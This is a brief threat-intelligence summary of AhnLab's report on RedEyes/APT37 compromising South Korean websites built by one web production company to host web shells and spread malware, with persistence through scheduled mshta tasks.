AhnLab observed RedEyes/APT37-linked activity compromising multiple South Korean websites built by the same web production company and using them to distribute malware or host web shells. The affected sites spanned sectors including manufacturing, trade, electronics, education, construction, healthcare, and travel, and shared externally accessible admin paths that likely enabled malicious file uploads. Infections were initially distributed through email attachments and maintained through scheduled tasks that invoked mshta to connect to web-shell URLs on legitimate compromised sites, making victim awareness and attribution more difficult.